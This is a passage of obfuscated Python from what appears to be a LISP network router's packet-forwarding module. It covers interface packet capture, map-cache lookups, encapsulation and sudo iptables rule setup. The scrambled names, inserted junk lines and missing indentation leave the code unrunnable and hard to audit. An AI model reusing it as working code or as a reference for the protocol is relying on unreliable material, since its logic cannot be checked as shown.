Ii1IIIIi1ii1I = list ( set ( i1iiiii1 . split ( ) ) & set ( iIiIIi1 ) )
IIII1i = list ( set ( i1iiiii1 . split ( ) ) ^ set ( iIiIIi1 ) )
O0iII1 = "user-selected "
lisp . lprint ( "User pcap-list: {}, active-interfaces: {}" . format ( i1iiiii1 , iIiIIi1 ) )
if 13 - 13: I1IiiI % OoOoOO00 . I1ii11iIi11i / Oo0Ooo % OOooOOo . OoooooooOO
iIiIIi1 = Ii1IIIIi1ii1I
if 22 - 22: IiII / i11iIiiIii
if 62 - 62: OoO0O00 / I1ii11iIi11i
if 7 - 7: OoooooooOO . IiII
if 53 - 53: Ii1I % Ii1I * o0oOOo0O0Ooo + OoOoOO00
if 92 - 92: OoooooooOO + i1IIi / Ii1I * O0
if 100 - 100: ooOoO0o % iIii1I11I1II1 * II111iiii - iII111i
if 92 - 92: ooOoO0o
II11iI111i1 = ( i1I11IiI1iiII . find ( "ether host" ) != - 1 )
for Oo00OoOo in iIiIIi1 :
if ( Oo00OoOo in [ "lo" , "lispers.net" ] and II11iI111i1 ) :
lisp . lprint ( ( "Capturing suppressed on interface {}, " + "MAC filters configured" ) . format ( Oo00OoOo ) )
if 24 - 24: i11iIiiIii - I1Ii111
continue
if 21 - 21: I11i
if 92 - 92: i11iIiiIii / I1Ii111 - iII111i % ooOoO0o * I1Ii111 + Oo0Ooo
ii1 = [ Oo00OoOo , i1I11IiI1iiII , i1iIIi1 ]
lisp . lprint ( "Capturing packets on {}interface {}" . format ( O0iII1 , Oo00OoOo ) )
threading . Thread ( target = Oo0000oOo , args = ii1 ) . start ( )
if 31 - 31: I11i . I1Ii111 * ooOoO0o + i11iIiiIii * oO0o
if ( ii1iIi1iIiI1i ) : return
if 93 - 93: I1ii11iIi11i / iIii1I11I1II1 * i1IIi % OoooooooOO * O0 * I11i
if 64 - 64: II111iiii + O0 / iIii1I11I1II1 / Oo0Ooo . ooOoO0o % IiII
if 50 - 50: iIii1I11I1II1 - IiII + OOooOOo
if 69 - 69: O0
if 85 - 85: ooOoO0o / O0
iI1iIIIi1i = "(udp src port 4342 and ip[28] == 0x28)"
for Oo00OoOo in IIII1i :
ii1 = [ Oo00OoOo , iI1iIIIi1i , i1iIIi1 ]
lisp . lprint ( "Capture RLOC-probe replies on RLOC interface {}" . format ( Oo00OoOo ) )
if 89 - 89: iIii1I11I1II1
threading . Thread ( target = Oo0000oOo , args = ii1 ) . start ( )
if 21 - 21: I11i % I11i
return
if 27 - 27: i11iIiiIii / I1ii11iIi11i
if 84 - 84: Oo0Ooo
if 43 - 43: oO0o - OoooooooOO
if 3 - 3: O0 / iII111i
if 31 - 31: OOooOOo + o0oOOo0O0Ooo . OoooooooOO
if 89 - 89: II111iiii + i1IIi + II111iiii
if 7 - 7: O0 % o0oOOo0O0Ooo + I1ii11iIi11i * iII111i - iII111i
def II1Ii11I111I ( ) :
if 13 - 13: ooOoO0o / iII111i * OoO0O00 . OoO0O00 * ooOoO0o
if 63 - 63: I1Ii111 / O0 * Oo0Ooo + II111iiii / IiII + Ii1I
if 63 - 63: OoO0O00 + I1ii11iIi11i . I1Ii111 % I1Ii111
if 57 - 57: II111iiii
if ( I11 ) : I11 . cancel ( )
if 54 - 54: Oo0Ooo + oO0o + i11iIiiIii
if 28 - 28: oO0o
if 70 - 70: IiII
if 34 - 34: I1Ii111 % IiII
lisp . lisp_close_socket ( II1iII1i [ 0 ] , "" )
lisp . lisp_close_socket ( II1iII1i [ 1 ] , "" )
lisp . lisp_close_socket ( i111I , "" )
lisp . lisp_close_socket ( II1Ii1iI1i , "" )
lisp . lisp_close_socket ( oO0oIIII , "lisp-itr" )
lisp . lisp_close_socket ( Oo0oO0oo0oO00 , "lispers.net-itr" )
return
if 3 - 3: II111iiii / OOooOOo + IiII . ooOoO0o . OoO0O00
if 83 - 83: oO0o + OoooooooOO
if 22 - 22: Ii1I % iII111i * OoooooooOO - o0oOOo0O0Ooo / iIii1I11I1II1
if 86 - 86: OoooooooOO . iII111i % OoOoOO00 / I11i * iII111i / o0oOOo0O0Ooo
if 64 - 64: i11iIiiIii
if 38 - 38: IiII / I1IiiI - IiII . I11i
if 69 - 69: OoooooooOO + I1ii11iIi11i
def O0oOo00o0 ( packet , device , input_interface , macs , my_sa ) :
global II1iII1i
global iiI1iIiI
global Ii1IIii11 , Oooo0000
global oO0oIIII
if 65 - 65: II111iiii . I1IiiI % oO0o * OoO0O00
if 38 - 38: OoOoOO00 / iII111i % Oo0Ooo
if 11 - 11: iII111i - oO0o + II111iiii - iIii1I11I1II1
if 7 - 7: IiII - I11i / II111iiii * Ii1I . iII111i * iII111i
O0O0oOOo0O = packet
packet , II11 , O00oooo00o0O , ii1iii1I1I = lisp . lisp_is_rloc_probe ( packet , 1 )
if ( O0O0oOOo0O != packet ) :
if ( II11 == None ) : return
lisp . lisp_parse_packet ( II1iII1i , packet , II11 , O00oooo00o0O , ii1iii1I1I )
return
if 95 - 95: IiII
if 51 - 51: II111iiii + IiII . i1IIi . I1ii11iIi11i + OoOoOO00 * I1IiiI
packet = lisp . lisp_packet ( packet )
if ( packet . decode ( False , None , None ) == None ) : return
if 72 - 72: oO0o + oO0o / II111iiii . OoooooooOO % Ii1I
if 49 - 49: oO0o . OoO0O00 - Oo0Ooo * OoooooooOO . Oo0Ooo
if 2 - 2: OoooooooOO % OOooOOo
if 63 - 63: I1IiiI % iIii1I11I1II1
if 39 - 39: iII111i / II111iiii / I1ii11iIi11i % I1IiiI
if 89 - 89: I1Ii111 + OoooooooOO + I1Ii111 * i1IIi + iIii1I11I1II1 % I11i
if ( my_sa ) : input_interface = device
if 59 - 59: OOooOOo + i11iIiiIii
if 88 - 88: i11iIiiIii - ooOoO0o
if 67 - 67: OOooOOo . Oo0Ooo + OoOoOO00 - OoooooooOO
if 70 - 70: OOooOOo / II111iiii - iIii1I11I1II1 - iII111i
Iii = packet . inner_source
OO00Oo = lisp . lisp_get_interface_instance_id ( input_interface , Iii )
packet . inner_dest . instance_id = OO00Oo
packet . inner_source . instance_id = OO00Oo
if 20 - 20: o0oOOo0O0Ooo / i1IIi
if 71 - 71: OoOoOO00 . i1IIi
if 94 - 94: OOooOOo . I1Ii111
if 84 - 84: O0 . I11i - II111iiii . ooOoO0o / II111iiii
if ( macs != "" ) : macs = ", MACs: " + macs + ","
packet . print_packet ( "Receive {}{}" . format ( device , macs ) , False )
if 47 - 47: OoooooooOO
if 4 - 4: I1IiiI % I11i
if 10 - 10: IiII . OoooooooOO - OoO0O00 + IiII - O0
if 82 - 82: ooOoO0o + II111iiii
if ( device != input_interface and device != "lispers.net" ) :
lisp . dprint ( "Not our MAC address on interface {}, pcap interface {}" . format ( input_interface , device ) )
if 39 - 39: oO0o % iIii1I11I1II1 % O0 % OoooooooOO * I1ii11iIi11i + iII111i
return
if 68 - 68: Oo0Ooo + i11iIiiIii
if 69 - 69: iIii1I11I1II1 * iIii1I11I1II1 * i11iIiiIii + I1IiiI / OOooOOo % Ii1I
O0OO0oOoO0O0O = lisp . lisp_decent_push_configured
if ( O0OO0oOoO0O0O ) :
oo000oOo0 = packet . inner_dest . is_multicast_address ( )
iIiI1I1Ii = packet . inner_source . is_local ( )
O0OO0oOoO0O0O = ( iIiI1I1Ii and oo000oOo0 )
if 50 - 50: OoO0O00 . i11iIiiIii - oO0o . oO0o
if 31 - 31: OOooOOo / Oo0Ooo * i1IIi . OoOoOO00
if ( O0OO0oOoO0O0O == False ) :
if 57 - 57: OOooOOo + iIii1I11I1II1 % i1IIi % I1IiiI
if 83 - 83: o0oOOo0O0Ooo / i11iIiiIii % iIii1I11I1II1 . I11i % oO0o . OoooooooOO
if 94 - 94: Ii1I + iIii1I11I1II1 % OoO0O00
if 93 - 93: Ii1I - OOooOOo + iIii1I11I1II1 * o0oOOo0O0Ooo + I1Ii111 . iII111i
Oo0ooOo0o = lisp . lisp_db_for_lookups . lookup_cache ( packet . inner_source , False )
if ( Oo0ooOo0o == None ) :
lisp . dprint ( "Packet received from non-EID source" )
return
if 49 - 49: OoooooooOO * I11i - Oo0Ooo . oO0o
if 89 - 89: ooOoO0o + Ii1I * ooOoO0o / ooOoO0o
if 46 - 46: OoO0O00
if 71 - 71: I11i / I11i * oO0o * oO0o / II111iiii
if 35 - 35: OOooOOo * o0oOOo0O0Ooo * I1IiiI % Oo0Ooo . OoOoOO00
if ( Oo0ooOo0o . dynamic_eid_configured ( ) ) :
O00o00O = lisp . lisp_allow_dynamic_eid ( input_interface ,
packet . inner_source )
if ( O00o00O ) :
lisp . lisp_itr_discover_eid ( Oo0ooOo0o , packet . inner_source ,
input_interface , O00o00O , oO0oIIII )
else :
ii1iii11i1 = lisp . green ( packet . inner_source . print_address ( ) , False )
lisp . dprint ( "Disallow dynamic-EID {} on interface {}" . format ( ii1iii11i1 ,
input_interface ) )
return
if 4 - 4: IiII . IiII % I1ii11iIi11i % Ii1I / Ii1I
if 29 - 29: Oo0Ooo * ooOoO0o * I1ii11iIi11i / i11iIiiIii
if 26 - 26: IiII % I1Ii111 % oO0o % Ii1I
if ( packet . inner_source . is_local ( ) and
packet . udp_dport == lisp . LISP_CTRL_PORT ) : return
if 55 - 55: ooOoO0o % OoooooooOO / OoooooooOO % OoooooooOO
if 52 - 52: I1ii11iIi11i + I1ii11iIi11i . II111iiii
if 34 - 34: OoooooooOO . O0 / oO0o * OoOoOO00 - I1ii11iIi11i
if 36 - 36: i1IIi / O0 / OoO0O00 - O0 - i1IIi
if 22 - 22: i1IIi + Ii1I
if ( packet . inner_version == 4 ) :
O0o0O0OO00o , packet . packet = lisp . lisp_ipv4_input ( packet . packet )
if ( packet . packet == None ) : return
packet . inner_ttl -= 1
elif ( packet . inner_version == 6 ) :
packet . packet = lisp . lisp_ipv6_input ( packet )
if ( packet . packet == None ) : return
packet . inner_ttl -= 1
else :
packet . packet = lisp . lisp_mac_input ( packet . packet )
if ( packet . packet == None ) : return
packet . encap_port = lisp . LISP_L2_DATA_PORT
if 92 - 92: o0oOOo0O0Ooo + I1Ii111 / Oo0Ooo % OoO0O00 % IiII . OoooooooOO
if 52 - 52: ooOoO0o / i11iIiiIii - OOooOOo . IiII % iIii1I11I1II1 + o0oOOo0O0Ooo
if 71 - 71: oO0o % I11i * OoOoOO00 . O0 / Ii1I . I1ii11iIi11i
if 58 - 58: Oo0Ooo / oO0o
if 44 - 44: OOooOOo
if 54 - 54: Ii1I - I11i - I1Ii111 . iIii1I11I1II1
if ( oo0O000OoO == False ) :
Oo0ooOo0o = lisp . lisp_db_for_lookups . lookup_cache ( packet . inner_dest , False )
if ( Oo0ooOo0o and Oo0ooOo0o . dynamic_eid_configured == False ) :
lisp . dprint ( ( "Packet destined to local EID-prefix {}, " + "natively forwarding" ) . format ( Oo0ooOo0o . print_eid_tuple ( ) ) )
if 79 - 79: Ii1I . OoO0O00
packet . send_packet ( Ii1IIii11 , packet . inner_dest )
return
if 40 - 40: o0oOOo0O0Ooo + Oo0Ooo . o0oOOo0O0Ooo % ooOoO0o
if 15 - 15: Ii1I * Oo0Ooo % I1ii11iIi11i * iIii1I11I1II1 - i11iIiiIii
if 60 - 60: I1IiiI * I1Ii111 % OoO0O00 + oO0o
if 52 - 52: i1IIi
if 84 - 84: Ii1I / IiII
if 86 - 86: OoOoOO00 * II111iiii - O0 . OoOoOO00 % iIii1I11I1II1 / OOooOOo
IiIIiIIIiIii = lisp . lisp_map_cache_lookup ( packet . inner_source , packet . inner_dest )
if ( IiIIiIIIiIii ) : IiIIiIIIiIii . add_recent_source ( packet . inner_source )
if 23 - 23: iII111i + I11i . OoOoOO00 * I1IiiI + I1ii11iIi11i
if 18 - 18: IiII * o0oOOo0O0Ooo . IiII / O0
if 8 - 8: o0oOOo0O0Ooo
if 4 - 4: I1ii11iIi11i + I1ii11iIi11i * ooOoO0o - OoOoOO00
if 78 - 78: Ii1I / II111iiii % OoOoOO00
if 52 - 52: OOooOOo - iII111i * oO0o
if 17 - 17: OoooooooOO + OOooOOo * I11i * OoOoOO00
iiIii1I = Oo0ooOo0o . secondary_iid if ( Oo0ooOo0o != None ) else None
if ( iiIii1I and IiIIiIIIiIii and IiIIiIIIiIii . action == lisp . LISP_NATIVE_FORWARD_ACTION ) :
i1I11iIiII = packet . inner_dest
i1I11iIiII . instance_id = iiIii1I
IiIIiIIIiIii = lisp . lisp_map_cache_lookup ( packet . inner_source , i1I11iIiII )
if ( IiIIiIIIiIii ) : IiIIiIIIiIii . add_recent_source ( packet . inner_source )
if 66 - 66: Oo0Ooo - o0oOOo0O0Ooo * IiII + OoOoOO00 + o0oOOo0O0Ooo - iIii1I11I1II1
if 17 - 17: oO0o
if 22 - 22: I11i + iIii1I11I1II1
if 24 - 24: OoOoOO00 % i1IIi + iII111i . i11iIiiIii . I1ii11iIi11i
if 17 - 17: I1ii11iIi11i . II111iiii . ooOoO0o / I1ii11iIi11i
if ( IiIIiIIIiIii == None or lisp . lisp_mr_or_pubsub ( IiIIiIIIiIii . action ) ) :
if ( lisp . lisp_rate_limit_map_request ( packet . inner_dest ) ) : return
if 57 - 57: I11i
oO0 = ( IiIIiIIIiIii and IiIIiIIIiIii . action == lisp . LISP_SEND_PUBSUB_ACTION )
lisp . lisp_send_map_request ( II1iII1i , iiI1iIiI ,
packet . inner_source , packet . inner_dest , None , oO0 )
if 87 - 87: oO0o % Ii1I
if ( packet . is_trace ( ) ) :
lisp . lisp_trace_append ( packet , reason = "map-cache miss" )
if 83 - 83: II111iiii - I11i
return
if 35 - 35: i1IIi - iIii1I11I1II1 + i1IIi
if 86 - 86: iIii1I11I1II1 + OoOoOO00 . i11iIiiIii - Ii1I
if 51 - 51: OoOoOO00
if 14 - 14: IiII % oO0o % Oo0Ooo - i11iIiiIii
if 53 - 53: Ii1I % Oo0Ooo
if 59 - 59: OOooOOo % iIii1I11I1II1 . i1IIi + II111iiii * IiII
if ( IiIIiIIIiIii and IiIIiIIIiIii . is_active ( ) and IiIIiIIIiIii . has_ttl_elapsed ( ) ) :
if ( lisp . lisp_rate_limit_map_request ( packet . inner_dest ) == False ) :
lisp . lprint ( "Refresh map-cache entry {}" . format ( lisp . green ( IiIIiIIIiIii . print_eid_tuple ( ) , False ) ) )
if 41 - 41: Ii1I % I1ii11iIi11i
lisp . lisp_send_map_request ( II1iII1i , iiI1iIiI ,
packet . inner_source , packet . inner_dest , None )
if 12 - 12: OOooOOo
if 69 - 69: OoooooooOO + OOooOOo
if 26 - 26: Oo0Ooo + OOooOOo / OoO0O00 % OoOoOO00 % I1ii11iIi11i + II111iiii
if 31 - 31: I11i % OOooOOo * I11i
if 45 - 45: i1IIi . I1IiiI + OOooOOo - OoooooooOO % ooOoO0o
if 1 - 1: iIii1I11I1II1
if 93 - 93: i1IIi . i11iIiiIii . Oo0Ooo
IiIIiIIIiIii . last_refresh_time = time . time ( )
IiIIiIIIiIii . stats . increment ( len ( packet . packet ) )
if 99 - 99: I11i - I1Ii111 - oO0o % OoO0O00
if 21 - 21: II111iiii % I1ii11iIi11i . i1IIi - OoooooooOO
if 4 - 4: OoooooooOO . ooOoO0o
if 78 - 78: I1ii11iIi11i + I11i - O0
i1I1iIi1IiI , i1111 , O0O000OOOo , i11ii1Ii1 , i1i1II1i11 , o00o = IiIIiIIIiIii . select_rloc ( packet , oO0oIIII )
if 21 - 21: OoooooooOO - iIii1I11I1II1
if 93 - 93: oO0o - o0oOOo0O0Ooo % OoOoOO00 . OoOoOO00 - ooOoO0o
if ( i1I1iIi1IiI == None and i1i1II1i11 == None ) :
if ( i11ii1Ii1 == lisp . LISP_NATIVE_FORWARD_ACTION ) :
lisp . dprint ( "Natively forwarding" )
packet . send_packet ( Ii1IIii11 , packet . inner_dest )
if 90 - 90: ooOoO0o + II111iiii * I1ii11iIi11i / Ii1I . o0oOOo0O0Ooo + o0oOOo0O0Ooo
if ( packet . is_trace ( ) ) :
lisp . lisp_trace_append ( packet , reason = "not an EID" )
if 40 - 40: ooOoO0o / OoOoOO00 % i11iIiiIii % I1ii11iIi11i / I1IiiI
return
if 62 - 62: i1IIi - OoOoOO00
oo0O0oo = "No reachable RLOCs found"
lisp . dprint ( oo0O0oo )
if ( packet . is_trace ( ) ) : lisp . lisp_trace_append ( packet , reason = oo0O0oo )
return
if 14 - 14: O0 / i1IIi / Oo0Ooo + iIii1I11I1II1
if ( i1I1iIi1IiI and i1I1iIi1IiI . is_null ( ) ) :
oo0O0oo = "Drop action RLOC found"
lisp . dprint ( oo0O0oo )
if 96 - 96: iII111i
if ( packet . is_trace ( ) ) : lisp . lisp_trace_append ( packet , reason = oo0O0oo )
return
if 18 - 18: iII111i * I11i - Ii1I
if 31 - 31: Oo0Ooo - O0 % OoOoOO00 % oO0o
if 45 - 45: I1ii11iIi11i + II111iiii * i11iIiiIii
if 13 - 13: OoooooooOO * oO0o - Ii1I / OOooOOo + I11i + IiII
if 39 - 39: iIii1I11I1II1 - OoooooooOO
packet . outer_tos = packet . inner_tos
packet . outer_ttl = 32 if ( O0o0O0OO00o ) else packet . inner_ttl
if 81 - 81: I1ii11iIi11i - O0 * OoooooooOO
if 23 - 23: II111iiii / oO0o
if 28 - 28: Oo0Ooo * ooOoO0o - OoO0O00
if 19 - 19: I11i
if ( i1I1iIi1IiI ) :
packet . outer_dest . copy_address ( i1I1iIi1IiI )
Ooooo0OoO0 = packet . outer_dest . afi_to_version ( )
packet . outer_version = Ooooo0OoO0
iI1 = lisp . lisp_myrlocs [ 0 ] if ( Ooooo0OoO0 == 4 ) else lisp . lisp_myrlocs [ 1 ]
if 31 - 31: oO0o / iIii1I11I1II1
packet . outer_source . copy_address ( iI1 )
if 84 - 84: OOooOOo
if ( packet . is_trace ( ) ) :
if ( lisp . lisp_trace_append ( packet , rloc_entry = o00o ) == False ) : return
if 87 - 87: ooOoO0o + o0oOOo0O0Ooo
if 28 - 28: OOooOOo * I1ii11iIi11i / oO0o
if 64 - 64: oO0o - I1IiiI / iII111i - OoO0O00
if 37 - 37: i11iIiiIii / iII111i
if 85 - 85: i11iIiiIii + I1Ii111 * OoOoOO00
if 1 - 1: i1IIi / Oo0Ooo . OoO0O00
if ( packet . encode ( O0O000OOOo ) == None ) : return
if ( len ( packet . packet ) <= 1500 ) : packet . print_packet ( "Send" , True )
if 57 - 57: I11i . Oo0Ooo + II111iiii
if 43 - 43: I1Ii111 % iII111i
if 69 - 69: iII111i % OoO0O00
if 86 - 86: oO0o / oO0o
IiiI = Oooo0000 if Ooooo0OoO0 == 6 else Ii1IIii11
packet . send_packet ( IiiI , packet . outer_dest )
if 19 - 19: II111iiii
elif ( i1i1II1i11 ) :
if 72 - 72: OoooooooOO / I1IiiI + Ii1I / OoOoOO00 * Ii1I
if 34 - 34: O0 * O0 % OoooooooOO + iII111i * iIii1I11I1II1 % Ii1I
if 25 - 25: I11i + OoOoOO00 . o0oOOo0O0Ooo % OoOoOO00 * OOooOOo
if 32 - 32: i11iIiiIii - I1Ii111
if 53 - 53: OoooooooOO - IiII
oOo = i1i1II1i11 . rle_nodes [ 0 ] . level
i1i = len ( packet . packet )
for IIIiiiI in i1i1II1i11 . rle_forwarding_list :
if ( IIIiiiI . level != oOo ) : return
if 94 - 94: O0 - I11i - iIii1I11I1II1 % ooOoO0o / Ii1I % iII111i
packet . outer_dest . copy_address ( IIIiiiI . address )
if ( O0OO0oOoO0O0O ) : packet . inner_dest . instance_id = 0xffffff
Ooooo0OoO0 = packet . outer_dest . afi_to_version ( )
packet . outer_version = Ooooo0OoO0
iI1 = lisp . lisp_myrlocs [ 0 ] if ( Ooooo0OoO0 == 4 ) else lisp . lisp_myrlocs [ 1 ]
if 44 - 44: Oo0Ooo % iIii1I11I1II1
packet . outer_source . copy_address ( iI1 )
if 90 - 90: II111iiii + OoooooooOO % OoooooooOO
if ( packet . is_trace ( ) ) :
if ( lisp . lisp_trace_append ( packet ) == False ) : return
if 35 - 35: iII111i / I1ii11iIi11i * OoooooooOO . II111iiii / Oo0Ooo
if 1 - 1: OoooooooOO + IiII . i1IIi % I11i
if ( packet . encode ( None ) == None ) : return
if 66 - 66: o0oOOo0O0Ooo + I1ii11iIi11i + I1IiiI - oO0o
if 12 - 12: iII111i . IiII . OoOoOO00 / O0
if 58 - 58: o0oOOo0O0Ooo - II111iiii % oO0o + I1Ii111 . OoOoOO00 / IiII
if 8 - 8: I1ii11iIi11i . OoO0O00 * I11i + II111iiii % i11iIiiIii
packet . print_packet ( "Replicate-to-L{}" . format ( IIIiiiI . level ) , True )
packet . send_packet ( Ii1IIii11 , packet . outer_dest )
if 8 - 8: ooOoO0o * O0
if 73 - 73: o0oOOo0O0Ooo / oO0o / I11i / OoO0O00
if 11 - 11: OoOoOO00 + IiII - OoooooooOO / OoO0O00
if 34 - 34: ooOoO0o
if 45 - 45: ooOoO0o / Oo0Ooo / Ii1I
IIi11i1II = len ( packet . packet ) - i1i
packet . packet = packet . packet [ IIi11i1II : : ]
if 73 - 73: o0oOOo0O0Ooo - I1IiiI * i1IIi / i11iIiiIii * OOooOOo % II111iiii
if 56 - 56: OoooooooOO * Oo0Ooo . Oo0Ooo . I1ii11iIi11i
if 24 - 24: Oo0Ooo . I11i * Ii1I % iII111i / OOooOOo
if 58 - 58: I1IiiI - I1ii11iIi11i % O0 . I1IiiI % OoO0O00 % IiII
if 87 - 87: oO0o - i11iIiiIii
if 78 - 78: i11iIiiIii / iIii1I11I1II1 - o0oOOo0O0Ooo
del ( packet )
return
if 23 - 23: I11i
if 40 - 40: o0oOOo0O0Ooo - II111iiii / Oo0Ooo
if 14 - 14: I1ii11iIi11i
if 5 - 5: o0oOOo0O0Ooo . iIii1I11I1II1 % iIii1I11I1II1
if 56 - 56: OoooooooOO - I11i - i1IIi
if 8 - 8: I1Ii111 / OOooOOo . I1IiiI + I1ii11iIi11i / i11iIiiIii
if 31 - 31: ooOoO0o - iIii1I11I1II1 + iII111i . Oo0Ooo / IiII % iIii1I11I1II1
def I11i1iIiiIiIi ( device , not_used , packet ) :
I1i = 4 if device == "lo0" else 0 if device == "lispers.net" else 14
if 59 - 59: OoooooooOO . Ii1I / O0 - OOooOOo
if ( lisp . lisp_frame_logging ) :
i1I1i = lisp . bold ( "Received frame on interface '{}'" . format ( device ) ,
False )
OO0o = lisp . lisp_format_packet ( packet [ 0 : 64 ] )
lisp . lprint ( "{}: {}" . format ( i1I1i , OO0o ) )
if 32 - 32: OoooooooOO - OoOoOO00 - i11iIiiIii * o0oOOo0O0Ooo / Oo0Ooo + OoooooooOO
if 35 - 35: i1IIi - o0oOOo0O0Ooo * iII111i
if 63 - 63: iII111i * I1ii11iIi11i . OoooooooOO / OOooOOo * Oo0Ooo . ooOoO0o
if 62 - 62: i1IIi / ooOoO0o . I1IiiI * o0oOOo0O0Ooo
if 21 - 21: o0oOOo0O0Ooo
O0Oo0 = ""
o0oO0oo0000OO = False
OOo0oO00ooO00 = device
if ( I1i == 14 ) :
iIiIIi1 , I1i1ii1IiIii , oOOO0O0Ooo , o0oO0oo0000OO = lisp . lisp_get_input_interface ( packet )
OOo0oO00ooO00 = device if ( device in iIiIIi1 ) else iIiIIi1 [ 0 ]
O0Oo0 = lisp . lisp_format_macs ( I1i1ii1IiIii , oOOO0O0Ooo )
if ( OOo0oO00ooO00 . find ( "vlan" ) != - 1 ) : I1i += 4
if 4 - 4: II111iiii . I11i + Ii1I * I1Ii111 . ooOoO0o
if 87 - 87: OoOoOO00 / OoO0O00 / i11iIiiIii
if 74 - 74: oO0o / I1ii11iIi11i % o0oOOo0O0Ooo
if 88 - 88: OoOoOO00 - i11iIiiIii % o0oOOo0O0Ooo * I11i + I1ii11iIi11i
if 52 - 52: II111iiii . I1IiiI + OoOoOO00 % OoO0O00
if 62 - 62: o0oOOo0O0Ooo
if ( int ( oOOO0O0Ooo [ 1 ] , 16 ) & 1 ) : o0oO0oo0000OO = True
if 15 - 15: I11i + Ii1I . OOooOOo * OoO0O00 . OoOoOO00
if 18 - 18: i1IIi % II111iiii + I1Ii111 % Ii1I
if 72 - 72: iIii1I11I1II1
if 45 - 45: Oo0Ooo - o0oOOo0O0Ooo % I1Ii111
if 38 - 38: I1Ii111 % OOooOOo - OoooooooOO
if ( I1i != 0 ) :
oOo0OOoooO = struct . unpack ( "H" , packet [ I1i - 2 : I1i ] ) [ 0 ]
oOo0OOoooO = socket . ntohs ( oOo0OOoooO )
if ( oOo0OOoooO == 0x8100 ) :
iIi1iIIIiIiI = struct . unpack ( "I" , packet [ I1i : I1i + 4 ] ) [ 0 ]
iIi1iIIIiIiI = socket . ntohl ( iIi1iIIIiIiI )
OOo0oO00ooO00 = "vlan" + str ( iIi1iIIIiIiI >> 16 )
I1i += 4
elif ( oOo0OOoooO == 0x806 ) :
lisp . dprint ( "Dropping ARP packets, host should have default route" )
return
if 62 - 62: i11iIiiIii % OOooOOo . IiII . OOooOOo
if 84 - 84: i11iIiiIii * OoO0O00
if 18 - 18: OOooOOo - Ii1I - OoOoOO00 / I1Ii111 - O0
if ( lisp . lisp_l2_overlay ) : I1i = 0
if 30 - 30: O0 + I1ii11iIi11i + II111iiii
O0oOo00o0 ( packet [ I1i : : ] , device , OOo0oO00ooO00 , O0Oo0 , o0oO0oo0000OO )
return
if 14 - 14: o0oOOo0O0Ooo / OOooOOo - iIii1I11I1II1 - oO0o % ooOoO0o
if 49 - 49: ooOoO0o * oO0o / o0oOOo0O0Ooo / Oo0Ooo * iIii1I11I1II1
if 57 - 57: OoOoOO00 - oO0o / ooOoO0o % i11iIiiIii
if 3 - 3: iII111i . ooOoO0o % I1IiiI + I1ii11iIi11i
if 64 - 64: i1IIi
if 29 - 29: o0oOOo0O0Ooo / i11iIiiIii / I1IiiI % oO0o % i11iIiiIii
if 18 - 18: OOooOOo + I1Ii111
if 80 - 80: oO0o + o0oOOo0O0Ooo * Ii1I + OoO0O00
if 75 - 75: I11i / o0oOOo0O0Ooo / OOooOOo / IiII % ooOoO0o + II111iiii
if 4 - 4: iII111i - Oo0Ooo - IiII - I11i % i11iIiiIii / OoO0O00
if 50 - 50: ooOoO0o + i1IIi
if 31 - 31: Ii1I
if 78 - 78: i11iIiiIii + o0oOOo0O0Ooo + I1Ii111 / o0oOOo0O0Ooo % iIii1I11I1II1 % IiII
if 83 - 83: iIii1I11I1II1 % OoOoOO00 % o0oOOo0O0Ooo % I1Ii111 . I1ii11iIi11i % O0
if 47 - 47: o0oOOo0O0Ooo
if 66 - 66: I1IiiI - IiII
if 33 - 33: I1IiiI / OoO0O00
if 12 - 12: II111iiii
if 2 - 2: i1IIi - I1IiiI + I11i . II111iiii
if 25 - 25: oO0o
if 34 - 34: OoOoOO00 . iIii1I11I1II1 % O0
if 43 - 43: I1ii11iIi11i - iII111i
if 70 - 70: iII111i / OOooOOo % ooOoO0o - Ii1I
if 47 - 47: iII111i
if 92 - 92: OOooOOo + OoOoOO00 % i1IIi
if 23 - 23: I1Ii111 - OOooOOo + Ii1I - OoOoOO00 * OoOoOO00 . Oo0Ooo
if 47 - 47: oO0o % iIii1I11I1II1
if 11 - 11: I1IiiI % Ii1I - OoO0O00 - oO0o + o0oOOo0O0Ooo
if 98 - 98: iII111i + Ii1I - OoO0O00
if 79 - 79: OOooOOo / I1Ii111 . OoOoOO00 - I1ii11iIi11i
if 47 - 47: OoooooooOO % O0 * iII111i . Ii1I
if 38 - 38: O0 - IiII % I1Ii111
if 64 - 64: iIii1I11I1II1
if 15 - 15: I1ii11iIi11i + OOooOOo / I1ii11iIi11i / I1Ii111
if 31 - 31: ooOoO0o + O0 + ooOoO0o . iIii1I11I1II1 + Oo0Ooo / o0oOOo0O0Ooo
if 6 - 6: Oo0Ooo % IiII * I11i / I1IiiI + Oo0Ooo
if 39 - 39: OoOoOO00 - Oo0Ooo / iII111i * OoooooooOO
def OO0oOOoo ( sources , dyn_eids ) :
if ( os . getenv ( "LISP_NO_IPTABLES" ) != None ) :
lisp . lprint ( "User selected to suppress installing iptables rules" )
return
if 100 - 100: O0 . I11i . OoO0O00 + O0 * oO0o
if 42 - 42: oO0o % OoooooooOO + o0oOOo0O0Ooo
os . system ( "sudo iptables -t raw -N lisp" )
os . system ( "sudo iptables -t raw -A PREROUTING -j lisp" )
os . system ( "sudo ip6tables -t raw -N lisp" )
os . system ( "sudo ip6tables -t raw -A PREROUTING -j lisp" )
if 56 - 56: OoooooooOO + I1ii11iIi11i - iII111i
if 24 - 24: o0oOOo0O0Ooo + ooOoO0o + I11i - iIii1I11I1II1
if 49 - 49: I11i . ooOoO0o * OoOoOO00 % IiII . O0
if 48 - 48: O0 * Ii1I - O0 / Ii1I + OoOoOO00
if 52 - 52: OoO0O00 % Ii1I * II111iiii
if 4 - 4: I11i % O0 - OoooooooOO + ooOoO0o . oO0o % II111iiii
if 9 - 9: II111iiii * II111iiii . i11iIiiIii * iIii1I11I1II1
if 18 - 18: OoO0O00 . II111iiii % OoOoOO00 % Ii1I
oo0i1iIIi1II1iiI = "sudo ip{}tables -t raw -A lisp -j ACCEPT -d {}"
III1Ii1i1I1 = [ "127.0.0.1" , "::1" , "224.0.0.0/4 -p igmp" , "ff00::/8" ,
"fe80::/16" ]
III1Ii1i1I1 += sources + lisp . lisp_get_all_addresses ( )
for O0O00OooO in III1Ii1i1I1 :
if ( lisp . lisp_is_mac_string ( O0O00OooO ) ) : continue
I1IiI1iI11 = "" if O0O00OooO . find ( ":" ) == - 1 else "6"
os . system ( oo0i1iIIi1II1iiI . format ( I1IiI1iI11 , O0O00OooO ) )
if 2 - 2: iIii1I11I1II1
if 45 - 45: OoooooooOO / i11iIiiIii
if 10 - 10: iII111i - oO0o * iIii1I11I1II1 % iIii1I11I1II1 * IiII - I1ii11iIi11i
